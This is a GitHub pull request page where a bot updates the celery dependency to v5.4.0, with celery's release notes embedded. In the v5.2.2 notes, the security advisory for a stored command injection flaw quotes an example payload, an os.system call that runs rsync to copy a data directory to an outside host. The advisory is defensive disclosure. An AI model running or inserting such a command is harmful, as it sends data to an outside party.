-
Notifications
You must be signed in to change notification settings - Fork 1
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
build(deps): update dependency celery to v5.4.0 #225
Open
renovate
wants to merge
1
commit into
master
Choose a base branch
from
renovate/celery-5.x
base: master
Could not load branches
Branch not found: {{ refName }}
Loading
Could not load tags
Nothing to show
Loading
Are you sure you want to change the base?
Some commits from the old base branch may be removed from the timeline,
and old review comments may become outdated.
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
renovate
bot
added
dependencies
Pull requests that update a dependency file
python
labels
Nov 8, 2021
renovate
bot
force-pushed
the
renovate/celery-5.x
branch
8 times, most recently
from
November 14, 2021 21:54
c1af32b
to
d5a8a05
Compare
renovate
bot
force-pushed
the
renovate/celery-5.x
branch
from
November 16, 2021 16:55
d5a8a05
to
075d448
Compare
renovate
bot
changed the title
build(deps): update dependency celery to v5.2.0
build(deps): update dependency celery to v5.2.1
Nov 16, 2021
renovate
bot
force-pushed
the
renovate/celery-5.x
branch
4 times, most recently
from
November 18, 2021 22:37
62e8ec2
to
e4ca787
Compare
renovate
bot
force-pushed
the
renovate/celery-5.x
branch
4 times, most recently
from
November 30, 2021 22:26
853a1cf
to
782736f
Compare
renovate
bot
force-pushed
the
renovate/celery-5.x
branch
5 times, most recently
from
December 8, 2021 00:46
ef426d5
to
d408999
Compare
renovate
bot
force-pushed
the
renovate/celery-5.x
branch
from
December 26, 2021 14:56
d408999
to
202d68b
Compare
renovate
bot
changed the title
build(deps): update dependency celery to v5.2.1
build(deps): update dependency celery to v5.2.2
Dec 26, 2021
renovate
bot
force-pushed
the
renovate/celery-5.x
branch
from
December 29, 2021 09:01
202d68b
to
0997ef4
Compare
renovate
bot
changed the title
build(deps): update dependency celery to v5.2.2
build(deps): update dependency celery to v5.2.3
Dec 29, 2021
renovate
bot
changed the title
build(deps): update dependency celery to v5.2.3
build(deps): update dependency celery to v5.2.6
Apr 24, 2022
renovate
bot
force-pushed
the
renovate/celery-5.x
branch
from
April 24, 2022 22:16
0997ef4
to
e0dc419
Compare
renovate
bot
force-pushed
the
renovate/celery-5.x
branch
from
June 18, 2022 22:23
e0dc419
to
e87a815
Compare
renovate
bot
changed the title
build(deps): update dependency celery to v5.2.6
build(deps): update dependency celery to v5.2.7
Jun 18, 2022
renovate
bot
changed the title
build(deps): update dependency celery to v5.2.7
build(deps): update dependency celery to v5.3.0
Jun 6, 2023
renovate
bot
force-pushed
the
renovate/celery-5.x
branch
from
June 6, 2023 06:46
e87a815
to
9953c3b
Compare
renovate
bot
changed the title
build(deps): update dependency celery to v5.3.0
build(deps): update dependency celery to v5.3.1
Jun 18, 2023
renovate
bot
force-pushed
the
renovate/celery-5.x
branch
from
June 18, 2023 16:14
9953c3b
to
236f339
Compare
renovate
bot
changed the title
build(deps): update dependency celery to v5.3.1
build(deps): update dependency celery to v5.3.3
Aug 31, 2023
renovate
bot
force-pushed
the
renovate/celery-5.x
branch
2 times, most recently
from
September 2, 2023 10:15
b0438a9
to
35b886b
Compare
renovate
bot
changed the title
build(deps): update dependency celery to v5.3.3
build(deps): update dependency celery to v5.3.1
Sep 2, 2023
renovate
bot
changed the title
build(deps): update dependency celery to v5.3.1
build(deps): update dependency celery to v5.3.4
Sep 3, 2023
renovate
bot
force-pushed
the
renovate/celery-5.x
branch
from
September 3, 2023 23:28
35b886b
to
4914890
Compare
renovate
bot
changed the title
build(deps): update dependency celery to v5.3.4
build(deps): update dependency celery to v5.3.5
Nov 10, 2023
renovate
bot
force-pushed
the
renovate/celery-5.x
branch
from
November 10, 2023 14:18
4914890
to
a34331b
Compare
renovate
bot
changed the title
build(deps): update dependency celery to v5.3.5
build(deps): update dependency celery to v5.3.6
Nov 22, 2023
renovate
bot
force-pushed
the
renovate/celery-5.x
branch
from
November 22, 2023 16:31
a34331b
to
e3f10f0
Compare
renovate
bot
force-pushed
the
renovate/celery-5.x
branch
from
April 17, 2024 22:59
e3f10f0
to
afeded9
Compare
renovate
bot
changed the title
build(deps): update dependency celery to v5.3.6
build(deps): update dependency celery to v5.4.0
Apr 17, 2024
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This PR contains the following updates:
==5.1.2
->==5.4.0
Release Notes
celery/celery (celery)
v5.4.0
Compare Source
=====
:release-date: 2024-04-17
:release-by: Tomer Nosrati
Celery v5.4.0 and v5.3.x have consistently focused on enhancing the overall QA, both internally and externally.
This effort led to the new pytest-celery v1.0.0 release, developed concurrently with v5.3.0 & v5.4.0.
This release introduces two significant QA enhancements:
Standalone Bug Report Script <https://docs.celeryq.dev/projects/pytest-celery/en/latest/userguide/celery-bug-report.html>
_: The new pytest-celery plugin now allows for encapsulating a complete Celery dockerized setup within a single pytest script. Incorporating these into new bug reports will enable us to reproduce reported bugs deterministically, potentially speeding up the resolution process.Contrary to the positive developments above, there have been numerous reports about issues with the Redis broker malfunctioning
upon restarts and disconnections. Our initial attempts to resolve this were not successful (#8796).
With our enhanced QA capabilities, we are now prepared to address the core issue with Redis (as a broker) again.
The rest of the changes for this release are grouped below, with the changes from the latest release candidate listed at the end.
Changes
Changes since 5.4.0rc2
v5.3.6
Compare Source
=====
:release-date: 2023-11-22 9:15 P.M GMT+6
:release-by: Asif Saif Uddin
This release is focused mainly to fix AWS SQS new feature comatibility issue and old regressions.
The code changes are mostly fix for regressions. More details can be found below.
v5.3.5
Compare Source
=====
:release-date: 2023-11-10 7:15 P.M GMT+6
:release-by: Asif Saif Uddin
v5.3.4
Compare Source
=====
:release-date: 2023-09-03 10:10 P.M GMT+2
:release-by: Tomer Nosrati
.. warning::
This version has reverted the breaking changes introduced in 5.3.2 and 5.3.3:
Revert "store children with database backend" (#8475)
Revert "Fix eager tasks does not populate name field" (#8476)
Bugfix: Removed unecessary stamping code from _chord.run() (#8339)
User guide fix (hotfix for #1755) (#8342)
store children with database backend (#8338)
Stamping bugfix with group/chord header errback linking (#8347)
Use argsrepr and kwargsrepr in LOG_RECEIVED (#8301)
Fixing minor typo in code example in calling.rst (#8366)
add documents for timeout settings (#8373)
fix: copyright year (#8380)
setup.py: enable include_package_data (#8379)
Fix eager tasks does not populate name field (#8383)
Update test.txt dependencies (#8389)
Update auth.txt deps (#8392)
Fix backend.get_task_meta ignores the result_extended config parameter in mongodb backend (#8391)
Support preload options for shell and purge commands (#8374)
Implement safer ArangoDB queries (#8351)
integration test: cleanup worker after test case (#8361)
Added "Tomer Nosrati" to CONTRIBUTORS.txt (#8400)
Update README.rst (#8404)
Update README.rst (#8408)
fix(canvas): add group index when unrolling tasks (#8427)
fix(beat): debug statement should only log AsyncResult.id if it exists (#8428)
Lint fixes & pre-commit autoupdate (#8414)
Update auth.txt (#8435)
Update mypy on test.txt (#8438)
added missing kwargs arguments in some cli cmd (#8049)
Fix #8431: Set format_date to False when calling _get_result_meta on mongo backend (#8432)
Docs: rewrite out-of-date code (#8441)
Limit redis client to 4.x since 5.x fails the test suite (#8442)
Limit tox to < 4.9 (#8443)
Fixed issue: Flags broker_connection_retry_on_startup & broker_connection_retry aren’t reliable (#8446)
doc update from #7651 (#8451)
Remove tox version limit (#8464)
Fixed AttributeError: 'str' object has no attribute (#8463)
Upgraded Kombu from 5.3.1 -> 5.3.2 (#8468)
Document need for CELERY_ prefix on CLI env vars (#8469)
Use string value for CELERY_SKIP_CHECKS envvar (#8462)
Revert "store children with database backend" (#8475)
Revert "Fix eager tasks does not populate name field" (#8476)
Update Changelog (#8474)
Remove as it seems to be buggy. (#8340)
Revert "Add Semgrep to CI" (#8477)
Revert "Revert "Add Semgrep to CI"" (#8478)
.. _version-5.3.3:
v5.3.1
Compare Source
=====
:release-date: 2023-06-18 8:15 P.M GMT+6
:release-by: Asif Saif Uddin
.. _version-5.3.0:
v5.3.0
Compare Source
=====
:release-date: 2023-06-06 12:00 P.M GMT+6
:release-by: Asif Saif Uddin
.. _version-5.3.0rc2:
v5.2.7
Compare Source
=====
:release-date: 2022-5-26 12:15 P.M UTC+2:00
:release-by: Omer Katz
.. _version-5.2.6:
v5.2.6
Compare Source
=====
:release-date: 2022-4-04 21:15 P.M UTC+2:00
:release-by: Omer Katz
This fixes a regression caused by #7218.
.. _version-5.2.5:
v5.2.5
Compare Source
=====
:release-date: 2022-4-03 20:42 P.M UTC+2:00
:release-by: Omer Katz
This release was yanked due to a regression caused by the PR below
.. _version-5.2.4:
v5.2.4
Compare Source
=====
:release-date: 2022-4-03 20:30 P.M UTC+2:00
:release-by: Omer Katz
.. _version-5.2.3:
v5.2.3
Compare Source
=====
:release-date: 2021-12-29 12:00 P.M UTC+6:00
:release-by: Asif Saif Uddin
.. _version-5.2.2:
v5.2.2
Compare Source
=====
:release-date: 2021-12-26 16:30 P.M UTC+2:00
:release-by: Omer Katz
Various documentation fixes.
Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend.
In some cases, the exception class is only importable from the
consumer's code base. In this case, we reconstruct the exception class
so that we can re-raise the error on the process which queried the
task's result. This was introduced in #4836.
If the recreated exception type isn't an exception, this is a security issue.
Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
os.system("rsync /data [email protected]:~/data")
by setting the task's result to a failure in the result backend with the os,
the system function as the exception type and the payload
rsync /data [email protected]:~/data
as the exception arguments like so:.. code-block:: python
According to my analysis, this vulnerability can only be exploited if
the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result.
The attacker would also have to gain access to the result backend.
The severity of this security vulnerability is low, but we still
recommend upgrading.
.. _version-5.2.1:
v5.2.1
Compare Source
=====
:release-date: 2021-11-16 8.55 P.M UTC+6:00
:release-by: Asif Saif Uddin
.. _version-5.2.0:
v5.2.0
Compare Source
=====
:release-date: 2021-11-08 7.15 A.M UTC+6:00
:release-by: Asif Saif Uddin
.. _version-5.2.0rc2:
Configuration
📅 Schedule: Branch creation - "after 10pm every weekday,every weekend" in timezone Africa/Lusaka, Automerge - At any time (no schedule defined).
🚦 Automerge: Enabled.
♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.